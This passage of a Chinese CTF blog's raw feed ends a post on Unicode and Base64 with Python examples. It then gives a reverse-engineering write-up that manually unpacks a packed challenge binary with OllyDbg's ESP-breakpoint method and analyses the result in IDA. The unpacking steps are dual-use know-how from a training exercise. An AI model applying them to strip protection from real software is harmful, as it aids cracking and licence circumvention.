href="https://zh.wikipedia.org/w/index.php?title=瓦伊文&action=edit&redlink=1" target="_blank" rel="noopener">瓦伊文</a>、<a href="https://zh.wikipedia.org/wiki/斐斯托斯圓盤" target="_blank" rel="noopener">斐斯托斯圆盘</a>,<a href="https://zh.wikipedia.org/wiki/麻将" target="_blank" rel="noopener">麻将</a>、<a href="https://zh.wikipedia.org/wiki/多米诺骨牌" target="_blank" rel="noopener">多米诺骨牌</a>上的符号、<a href="https://zh.wikipedia.org/w/index.php?title=阿维斯陀文&action=edit&redlink=1" target="_blank" rel="noopener">阿维斯陀文</a>,<a href="https://zh.wikipedia.org/wiki/巴姆穆文字" target="_blank" rel="noopener">巴姆穆文字</a>,<a href="https://zh.wikipedia.org/wiki/埃及象形文字" target="_blank" rel="noopener">埃及象形文字</a> (<a href="https://zh.wikipedia.org/wiki/加汀納符號表" target="_blank" rel="noopener">加汀纳符号表</a>,涵盖1071个符号),<a href="https://zh.wikipedia.org/wiki/亞拉姆文" target="_blank" rel="noopener">亚拉姆文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=巴拉维碑铭体&action=edit&redlink=1" target="_blank" rel="noopener">巴拉维碑铭体</a>,<a href="https://zh.wikipedia.org/w/index.php?title=帕提亚碑铭体&action=edit&redlink=1" target="_blank" rel="noopener">帕提亚碑铭体</a>,<a href="https://zh.wikipedia.org/wiki/爪哇文" target="_blank" rel="noopener">爪哇文</a>,<a href="https://zh.wikipedia.org/wiki/凱提文" target="_blank" rel="noopener">凯提文</a>,<a href="https://zh.wikipedia.org/wiki/老傈僳文" target="_blank" rel="noopener">老傈僳文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=曼尼普尔文&action=edit&redlink=1" target="_blank" rel="noopener">曼尼普尔文</a>,<a href="https://zh.wikipedia.org/wiki/南阿拉伯字母" target="_blank" rel="noopener">南阿拉伯字母</a>,<a href="https://zh.wikipedia.org/wiki/古突厥文" target="_blank" rel="noopener">古突厥文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=撒玛利亚字母&action=edit&redlink=1" target="_blank" rel="noopener">撒玛利亚字母</a>,<a href="https://zh.wikipedia.org/wiki/老傣文" target="_blank" rel="noopener">老傣文</a>、<a href="https://zh.wikipedia.org/wiki/傣黯語" target="_blank" rel="noopener">傣越文</a>。、<a href="https://zh.wikipedia.org/w/index.php?title=巴塔克字母&action=edit&redlink=1" target="_blank" rel="noopener">巴塔克字母</a>,<a href="https://zh.wikipedia.org/wiki/婆罗米文字" target="_blank" rel="noopener">婆罗米文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=曼达字母&action=edit&redlink=1" target="_blank" rel="noopener">曼达字母</a>,<a href="https://zh.wikipedia.org/wiki/纸牌" target="_blank" rel="noopener">纸牌</a>符号,<a href="https://zh.wikipedia.org/wiki/交通标志" target="_blank" rel="noopener">交通标志</a>,<a href="https://zh.wikipedia.org/wiki/地图" target="_blank" rel="noopener">地图</a>符号,<a href="https://zh.wikipedia.org/w/index.php?title=炼金术符号&action=edit&redlink=1" target="_blank" rel="noopener">炼金术符号</a>,<a href="https://zh.wikipedia.org/wiki/颜文字" target="_blank" rel="noopener">颜文字</a>、<a href="https://zh.wikipedia.org/wiki/绘文字" target="_blank" rel="noopener">绘文字</a>、<a href="https://zh.wikipedia.org/w/index.php?title=查克马字母&action=edit&redlink=1" target="_blank" rel="noopener">查克马字母</a>,<a href="https://zh.wikipedia.org/wiki/麦罗埃文" target="_blank" rel="noopener">麦罗埃文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=麦罗埃象形文字&action=edit&redlink=1" target="_blank" rel="noopener">麦罗埃象形文字</a>,<a href="https://zh.wikipedia.org/wiki/柏格理苗文" target="_blank" rel="noopener">柏格理苗文</a>,<a href="https://zh.wikipedia.org/wiki/夏拉達文" target="_blank" rel="noopener">夏拉达文</a>,<a href="https://zh.wikipedia.org/wiki/索拉僧平文字" target="_blank" rel="noopener">索拉僧平文字</a>、<a href="https://zh.wikipedia.org/w/index.php?title=泰克里文&action=edit&redlink=1" target="_blank" rel="noopener">泰克里文</a>、<a href="https://zh.wikipedia.org/wiki/土耳其里拉符号" target="_blank" rel="noopener">土耳其里拉符号</a>、5个双向排版符号、<a href="https://zh.wikipedia.org/w/index.php?title=巴萨字母&action=edit&redlink=1" target="_blank" rel="noopener">巴萨字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=高加索阿尔巴尼亚字母&action=edit&redlink=1" target="_blank" rel="noopener">高加索阿尔巴尼亚字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=杜普雷嚴速記&action=edit&redlink=1" target="_blank" rel="noopener">杜普雷严速记</a>,<a href="https://zh.wikipedia.org/w/index.php?title=爱尔巴桑字母&action=edit&redlink=1" target="_blank" rel="noopener">爱尔巴桑字母</a>,<a href="https://zh.wikipedia.org/wiki/古兰塔文" target="_blank" rel="noopener">古兰塔文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=可吉文&action=edit&redlink=1" target="_blank" rel="noopener">可吉文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=库达瓦迪文&action=edit&redlink=1" target="_blank" rel="noopener">库达瓦迪文</a>,<a href="https://zh.wikipedia.org/wiki/线形文字A" target="_blank" rel="noopener">线形文字A</a>,<a href="https://zh.wikipedia.org/w/index.php?title=马哈佳尼文&action=edit&redlink=1" target="_blank" rel="noopener">马哈佳尼文</a>,<a href="https://zh.wikipedia.org/wiki/摩尼教字母" target="_blank" rel="noopener">摩尼教字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=门得文字&action=edit&redlink=1" target="_blank" rel="noopener">门得文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=莫迪字母&action=edit&redlink=1" target="_blank" rel="noopener">莫迪字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=默文&action=edit&redlink=1" target="_blank" rel="noopener">默文</a>,<a href="https://zh.wikipedia.org/wiki/納巴泰字母" target="_blank" rel="noopener">纳巴泰字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=古北阿拉伯文&action=edit&redlink=1" target="_blank" rel="noopener">古北阿拉伯文</a>,<a href="https://zh.wikipedia.org/wiki/古彼爾姆文" target="_blank" rel="noopener">古彼尔姆文</a>,<a href="https://zh.wikipedia.org/wiki/杨松录苗文" target="_blank" rel="noopener">杨松录苗文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=帕米拉文字&action=edit&redlink=1" target="_blank" rel="noopener">帕米拉文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=袍清豪文&action=edit&redlink=1" target="_blank" rel="noopener">袍清豪文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=诗篇巴列维文&action=edit&redlink=1" target="_blank" rel="noopener">诗篇巴列维文</a>,<a href="https://zh.wikipedia.org/wiki/悉曇文字" target="_blank" rel="noopener">悉昙文字</a>,<a href="https://zh.wikipedia.org/wiki/底罗仆多文" target="_blank" rel="noopener">底罗仆多文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=瓦兰齐地文&action=edit&redlink=1" target="_blank" rel="noopener">瓦兰齐地文</a>、<a href="https://zh.wikipedia.org/wiki/Dingbat" target="_blank" rel="noopener">装饰符号</a>、<a href="https://zh.wikipedia.org/wiki/阿洪姆文" target="_blank" rel="noopener">阿洪姆文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=安纳托利亚象形文字&action=edit&redlink=1" target="_blank" rel="noopener">安纳托利亚象形文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=哈坦文&action=edit&redlink=1" target="_blank" rel="noopener">哈坦文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=穆尔塔尼文&action=edit&redlink=1" target="_blank" rel="noopener">穆尔塔尼文</a>,<a href="https://zh.wikipedia.org/wiki/古匈牙利字母" target="_blank" rel="noopener">古匈牙利字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=书写符号&action=edit&redlink=1" target="_blank" rel="noopener">书写符号</a>、<a href="https://zh.wikipedia.org/wiki/切罗基文" target="_blank" rel="noopener">切罗基文</a>小写字母,以及五种<a href="https://zh.wikipedia.org/wiki/绘文字" target="_blank" rel="noopener">绘文字</a><a href="https://zh.wikipedia.org/wiki/膚色" target="_blank" rel="noopener">肤色</a>修改字符、<a href="https://zh.wikipedia.org/w/index.php?title=阿德拉姆字母&action=edit&redlink=1" target="_blank" rel="noopener">阿德拉姆字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=比奇舒奇文&action=edit&redlink=1" target="_blank" rel="noopener">比奇舒奇文</a>,<a href="https://zh.wikipedia.org/wiki/象雄文" target="_blank" rel="noopener">象雄文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=尼泊尔纽瓦字母&action=edit&redlink=1" target="_blank" rel="noopener">尼泊尔纽瓦字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=欧塞奇字母&action=edit&redlink=1" target="_blank" rel="noopener">欧塞奇字母</a>,<a href="https://zh.wikipedia.org/wiki/西夏文" target="_blank" rel="noopener">西夏文</a>、绘字文、<a href="https://zh.wikipedia.org/wiki/蒙古文字" target="_blank" rel="noopener">札那巴札尔</a>、<a href="https://zh.wikipedia.org/wiki/索永布文字" target="_blank" rel="noopener">索永布文字</a>、<a href="https://zh.wikipedia.org/w/index.php?title=马萨拉姆贡德文字&action=edit&redlink=1" target="_blank" rel="noopener">马萨拉姆贡德文字</a>、<a href="https://zh.wikipedia.org/wiki/女书" target="_blank" rel="noopener">女书</a>、<a href="https://zh.wikipedia.org/wiki/變體假名" target="_blank" rel="noopener">变体假名</a>(非标准<a href="https://zh.wikipedia.org/wiki/平假名" target="_blank" rel="noopener">平假名</a>)、<a href="https://zh.wikipedia.org/w/index.php?title=多格拉文&action=edit&redlink=1" target="_blank" rel="noopener">多格拉文</a>、<a href="https://zh.wikipedia.org/wiki/喬治亞文" target="_blank" rel="noopener">格鲁吉亚文</a>骑士体大写字母、<a href="https://zh.wikipedia.org/w/index.php?title=贡贾拉贡德文&action=edit&redlink=1" target="_blank" rel="noopener">贡贾拉贡德文</a>、<a href="https://zh.wikipedia.org/wiki/哈乃斐羅興亞文字" target="_blank" rel="noopener">哈乃斐罗兴亚文字</a>、<a href="https://zh.wikipedia.org/w/index.php?title=望加锡文&action=edit&redlink=1" target="_blank" rel="noopener">望加锡文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=梅德法伊德林文&action=edit&redlink=1" target="_blank" rel="noopener">梅德法伊德林文</a>、<a href="https://zh.wikipedia.org/wiki/老粟特文" target="_blank" rel="noopener">老粟特文</a>、<a href="https://zh.wikipedia.org/wiki/粟特文" target="_blank" rel="noopener">粟特文</a>、<a href="https://zh.wikipedia.org/wiki/埃利邁文" target="_blank" rel="noopener">埃利迈文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=南迪城文&action=edit&redlink=1" target="_blank" rel="noopener">南迪城文</a>、<a href="https://zh.wikipedia.org/wiki/創世紀苗文" target="_blank" rel="noopener">创世纪苗文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=文乔文&action=edit&redlink=1" target="_blank" rel="noopener">文乔文</a>、<a href="https://zh.wikipedia.org/wiki/花剌子模语" target="_blank" rel="noopener">花剌子模语</a>、<a href="https://zh.wikipedia.org/wiki/迪维西语" target="_blank" rel="noopener">迪维西语</a>的<a href="https://zh.wikipedia.org/w/index.php?title=島字母&action=edit&redlink=1" target="_blank" rel="noopener">岛字母</a>、<a href="https://zh.wikipedia.org/wiki/契丹小字" target="_blank" rel="noopener">契丹小字</a>、<a href="https://zh.wikipedia.org/wiki/库尔德语字母" target="_blank" rel="noopener">库尔德语字母</a>的<a href="https://zh.wikipedia.org/wiki/库尔德语字母" target="_blank" rel="noopener">Yezidi体</a>、书写<a href="https://zh.wikipedia.org/wiki/豪萨语" target="_blank" rel="noopener">豪萨语</a>用的阿拉伯附加字母、<a href="https://zh.wikipedia.org/wiki/沃洛夫語" target="_blank" rel="noopener">沃洛夫语</a>、其他非洲语言、在巴基斯坦书写<a href="https://zh.wikipedia.org/w/index.php?title=印德科語&action=edit&redlink=1" target="_blank" rel="noopener">印德科语</a>和<a href="https://zh.wikipedia.org/wiki/旁遮普語" target="_blank" rel="noopener">旁遮普语</a>的补充字符、<a href="https://zh.wikipedia.org/wiki/粵語" target="_blank" rel="noopener">粤语</a>用的<a href="https://zh.wikipedia.org/wiki/粵語注音符號" target="_blank" rel="noopener">注音符号</a>、<a href="https://zh.wikipedia.org/wiki/共享創意" target="_blank" rel="noopener">共享创意</a>授权符号、七十或八十年代电讯用图符。</p><h3 id="Unicode编码系统可分为编码方式和实现方式两个层次。"><a href="#Unicode编码系统可分为编码方式和实现方式两个层次。" class="headerlink" title="Unicode编码系统可分为编码方式和实现方式两个层次。"></a>Unicode编码系统可分为编码方式和实现方式两个层次。</h3><p>目前实际应用的统一码版本对应于<a href="https://zh.wikipedia.org/wiki/UCS-2" target="_blank" rel="noopener">UCS-2</a>,使用16<a href="https://zh.wikipedia.org/wiki/位元" target="_blank" rel="noopener">位</a>的编码空间。也就是每个字符占用2个<a href="https://zh.wikipedia.org/wiki/字节" target="_blank" rel="noopener">字节</a>。这样理论上一共最多可以表示216(即65536)个字符。基本满足各种语言的使用。<br>UCS-4是一个更大的尚未填充完全的31位字符集,加上恒为0的首位,共需占据32位,即4字节。理论上最多能表示231个字符,完全可以涵盖一切语言所用的符号。<br>基本多文种平面的字符的编码为<em>U+hhhh</em>,其中每个<em>h</em>代表一个<a href="https://zh.wikipedia.org/wiki/十六进制" target="_blank" rel="noopener">十六进制</a>数字,与UCS-2编码完全相同。而其对应的4字节UCS-4编码后两个字节一致,前两个字节则所有位均为0。<br>Unicode的实现方式不同于编码方式。一个字符的Unicode编码是确定的。但是在实际传输过程中,由于不同<a href="https://zh.wikipedia.org/wiki/系统平台" target="_blank" rel="noopener">系统平台</a>的设计不一定一致,以及出于节省空间的目的,对Unicode编码的实现方式有所不同。Unicode的实现方式称为<strong>Unicod转换格式</strong>(Unicode Transformation Format,简称为UTF)。</p><p><a href="https://zh.wikipedia.org/wiki/Unicode" target="_blank" rel="noopener">Unicode_wiki百科</a></p><h2 id="base64"><a href="#base64" class="headerlink" title="base64"></a>base64</h2><p><strong>Base64</strong>是一种基于64个可打印字符来表示<a href="https://zh.wikipedia.org/wiki/二进制" target="_blank" rel="noopener">二进制数据</a>的表示方法。每6个<a href="https://zh.wikipedia.org/wiki/位元" target="_blank" rel="noopener">比特</a>为一个单元,Base64常用于在通常处理文本<a href="https://zh.wikipedia.org/wiki/数据" target="_blank" rel="noopener">数据</a>的场合,表示、传输、存储一些二进制数据,包括<a href="https://zh.wikipedia.org/wiki/MIME" target="_blank" rel="noopener">MIME</a>的<a href="https://zh.wikipedia.org/wiki/电子邮件" target="_blank" rel="noopener">电子邮件</a>及<a href="https://zh.wikipedia.org/wiki/XML" target="_blank" rel="noopener">XML</a>的一些复杂数据。</p><ul><li>编码“Man”</li></ul><table><thead><tr><th align="center">文本</th><th align="left">M</th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left">A</th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left">N</th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th><th align="left"></th></tr></thead><tbody><tr><td align="center">ASCII编码</td><td align="left">77</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">97</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">110</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">二进制位</td><td align="left">0</td><td align="left">1</td><td align="left">0</td><td align="left">0</td><td align="left">1</td><td align="left">1</td><td align="left">0</td><td align="left">1</td><td align="left">0</td><td align="left">1</td><td align="left">1</td><td align="left">0</td><td align="left">0</td><td align="left">0</td><td align="left">0</td><td align="left">1</td><td align="left">0</td><td align="left">1</td><td align="left">1</td><td align="left">0</td><td align="left">1</td><td align="left">1</td><td align="left">1</td><td align="left">0</td></tr><tr><td align="center">索引</td><td align="left">19</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">22</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">5</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">46</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">Base64编码</td><td align="left"><strong>T</strong></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">W</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">F</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left">u</td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td><td align="left"></td></tr></tbody></table><p>在此例中,Base64算法将3个字节编码为4个字符。</p><p>Base64索引表:</p><table><thead><tr><th align="center">数值</th><th align="center">字符</th><th align="center"></th><th align="center">数值</th><th align="center">字符</th><th align="center"></th><th align="center">数值</th><th align="center">字符</th><th align="left"></th><th align="left"></th><th align="left"></th></tr></thead><tbody><tr><td align="center">0</td><td align="center">A</td><td align="center">16</td><td align="center">Q</td><td align="center">32</td><td align="center">g</td><td align="center">48</td><td align="center">w</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">1</td><td align="center">B</td><td align="center">17</td><td align="center">R</td><td align="center">33</td><td align="center">h</td><td align="center">49</td><td align="center">x</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">2</td><td align="center">C</td><td align="center">18</td><td align="center">S</td><td align="center">34</td><td align="center">i</td><td align="center">50</td><td align="center">y</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">3</td><td align="center">D</td><td align="center">19</td><td align="center">T</td><td align="center">35</td><td align="center">j</td><td align="center">51</td><td align="center">z</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">4</td><td align="center">E</td><td align="center">20</td><td align="center">U</td><td align="center">36</td><td align="center">k</td><td align="center">52</td><td align="center">0</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">5</td><td align="center">F</td><td align="center">21</td><td align="center">V</td><td align="center">37</td><td align="center">l</td><td align="center">53</td><td align="center">1</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">6</td><td align="center">G</td><td align="center">22</td><td align="center">W</td><td align="center">38</td><td align="center">m</td><td align="center">54</td><td align="center">2</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">7</td><td align="center">H</td><td align="center">23</td><td align="center">X</td><td align="center">39</td><td align="center">n</td><td align="center">55</td><td align="center">3</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">8</td><td align="center">I</td><td align="center">24</td><td align="center">Y</td><td align="center">40</td><td align="center">o</td><td align="center">56</td><td align="center">4</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">9</td><td align="center">J</td><td align="center">25</td><td align="center">Z</td><td align="center">41</td><td align="center">p</td><td align="center">57</td><td align="center">5</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">10</td><td align="center">K</td><td align="center">26</td><td align="center">a</td><td align="center">42</td><td align="center">q</td><td align="center">58</td><td align="center">6</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">11</td><td align="center">L</td><td align="center">27</td><td align="center">b</td><td align="center">43</td><td align="center">r</td><td align="center">59</td><td align="center">7</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">12</td><td align="center">M</td><td align="center">28</td><td align="center">c</td><td align="center">44</td><td align="center">s</td><td align="center">60</td><td align="center">8</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">13</td><td align="center">N</td><td align="center">29</td><td align="center">d</td><td align="center">45</td><td align="center">t</td><td align="center">61</td><td align="center">9</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">14</td><td align="center">O</td><td align="center">30</td><td align="center">e</td><td align="center">46</td><td align="center">u</td><td align="center">62</td><td align="center">+</td><td align="left"></td><td align="left"></td><td align="left"></td></tr><tr><td align="center">15</td><td align="center">P</td><td align="center">31</td><td align="center">f</td><td align="center">47</td><td align="center">v</td><td align="center">63</td><td align="center">/</td><td align="left"></td><td align="left"></td><td align="left"></td></tr></tbody></table><p>大致过程:先将文本转为ascii码,再转为8位2进制数,再取其中6位得出对应的十进制数,再通过索引表中转换为字符</p><p>如果要编码的字节数不能被3整除,最后会多出1个或2个字节,那么可以使用下面的方法进行处理:先使用0字节值在末尾补足,使其能够被3整除,然后再进行Base64的编码。在编码后的Base64文本后加上一个或两个<code>=</code>号,代表补足的字节数。说,当最后剩余两个八位(待补足)字节(2个byte)时,最后一个6位的Base64字节块有四位是0值,最后附加上两个等号;如果最后剩余一个八位(待补足)字节(1个byte)时,最后一个6位的base字节块有两位是0值,最后附加一个等号。</p><h3 id="base64解码"><a href="#base64解码" class="headerlink" title="base64解码"></a>base64解码</h3><p><a href="http://tool.chinaz.com/Tools/Base64.aspx" target="_blank" rel="noopener">在线解码编码网站</a></p><h3 id="base64-python"><a href="#base64-python" class="headerlink" title="base64_python"></a>base64_python</h3><h4 id="想将字符串转编码成base64-要先将字符串转换成二进制数据"><a href="#想将字符串转编码成base64-要先将字符串转换成二进制数据" class="headerlink" title="想将字符串转编码成base64,要先将字符串转换成二进制数据"></a>想将字符串转编码成base64,要先将字符串转换成二进制数据</h4><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">url = "https://www.cnblogs.com/songzhixue/"</span><br><span class="line">bytes_url = url.encode("utf-8")</span><br><span class="line">str_url = base64.b64encode(bytes_url) # 被编码的参数必须是二进制数据</span><br><span class="line">print(str_url)</span><br><span class="line"></span><br><span class="line">b'aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vc29uZ3poaXh1ZS8='</span><br></pre></td></tr></table></figure></div><h4 id="将base64解码成字符串"><a href="#将base64解码成字符串" class="headerlink" title="将base64解码成字符串"></a>将base64解码成字符串</h4><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">import base64</span><br><span class="line">url = "aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vc29uZ3poaXh1ZS8="</span><br><span class="line">str_url = base64.b64decode(url).decode("utf-8")</span><br><span class="line">print(str_url)</span><br><span class="line"></span><br><span class="line">'https://www.cnblogs.com/songzhixue/'</span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<p>转载自海里大佬!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>BabyXor&OD手动脱壳</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/10/BabyXor&OD%E6%89%8B%E5%8A%A8%E8%84%B1%E5%A3%B3/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/10/BabyXor&OD%E6%89%8B%E5%8A%A8%E8%84%B1%E5%A3%B3/</id>
<published>2020-12-10T08:42:49.781Z</published>
<updated>2021-01-11T01:42:17.969Z</updated>
<content type="html"><![CDATA[<p>题目虽然常规,但是学到了一些关于手动脱壳的知识。</p><a id="more"></a><h3 id="脱壳过程"><a href="#脱壳过程" class="headerlink" title="脱壳过程"></a>脱壳过程</h3><p>查看文件,发现是奇奇怪怪的壳,于是我们用OD手动脱壳.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/zN8M6BDTdcQ9qnm.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>将文件拖入OD</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/jeLRZWtk1Ji3yTU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这里利用ESP脱壳大法,下面说一说ESP脱壳的具体步骤。</p><p> ESP定理脱壳(ESP在OD的寄存器中,我们只要在命令行下ESP的硬件访问断点,就会一下来到程序的OEP了!)</p><p>(1)开始就点F8,注意观察OD右上角的寄存器中ESP有没突现(变成红色)(这只是一 般情况下,更确切的说我们选择的ESP值是关键句之后的第一个ESP值)</p><p>(2)在命令行下:dd XXXXXXXX(指在当前代码中的ESP地址,或者是hr XXXXXXXX), 按回车</p><p>(3)选中下断的地址,断点—>硬件访问—>WORD断点</p><p>(4)按一下F9运行程序,直接来到了跳转处,按下F8,到达程序OEP</p><p>按下F8单步步过,发现ESP此时是红色,记下此时ESP寄存器中的值0019FF54(载入程序处的下一个ESP是红色,当然每个人机器上运行这个值有可能不同)</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/aUH4XvfgsziRWxD.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>在命令行下输入<code>dd 0019FF54</code>,然后按下回车键</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/jduGTcb6fvitU2D.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>选中要下断点的0019FF54那行,依次选择断点 -> 硬件访问 -> Word</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/1lWQXfnNxHJzvRU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>在菜单栏调试(D)下的硬件断点(H)下选项下可以看到我们设置的硬件断点</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/aH1pMEPU8bZIQwg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>按F9运行,然后我们F8单步走,到了有大跳转时不要再按F8了(这是向上跳转的),我们必须跳过去,因为接下来就有可能是程序的OEP领空</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/8qucbXtQJmy5wKH.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/n73SbGkKf8iYOhV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这里有更多关于ESP定律的资料</p><p><code>https://blog.csdn.net/qiurisuixiang/article/details/7649799</code></p><p><code>https://beikeit.com/post-614.html</code></p><h3 id="静态分析"><a href="#静态分析" class="headerlink" title="静态分析"></a>静态分析</h3><p>把已经脱壳的exe文件拖入ida中</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/4JNp1coPiFdHIaE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>先分析重要函数</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">v1 = sub_40108C((int)&unk_435DC0, <span class="number">56</span>);</span><br><span class="line">v2 = (char *)sub_401041((int)&unk_435DC0, (int)&dword_435DF8, <span class="number">0x38</span>u);</span><br><span class="line">v3 = malloc(<span class="number">0x64</span>u);</span><br><span class="line">v4 = strlen(v2);</span><br><span class="line">memcpy(v3, v2, v4);</span><br><span class="line">v5 = sub_4010C3(&unk_435DC0, v2, &dword_435E30, <span class="number">56</span>);</span><br><span class="line">sub_40101E(v1, v2, v5);</span><br></pre></td></tr></table></figure></div><p>找到这些重要的函数先看传参,并找出其关联</p><p>访问<code>&unk_435DC0</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/NKkzeQyIULaitJE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>显然这是一个数组,不过在这之间,和我一样的小菜鸡们注意了,怎么找值<br>1.找类型,此处类型为db,及占4个字节,及是以四个字节为媒介进行分开<br>2.看地址,上图是一个地址一个地址进行分开<br>3.看端序,及所谓小端序(高到低)和大端序(低到高)<br>又上面3个要点可以得到</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">435DC0=[0x66,0x6d,0x63,0x64,0x7f,0x37,0x35,0x30,0x30,0x6b,0x3a,0x3c,0x3b,0x20]</span><br></pre></td></tr></table></figure></div><p>访问<code>&dword_435DF8</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/FUoj5SqeuXcrDEY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">435DF8=[0x37,0x6f,0x38,0x62,0x36,0x7c,0x37,0x33,0x34,0x76,0x33,0x62,0x64,0x7a]</span><br></pre></td></tr></table></figure></div><p>访问<code>dword_435E30</code><br>得到</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" 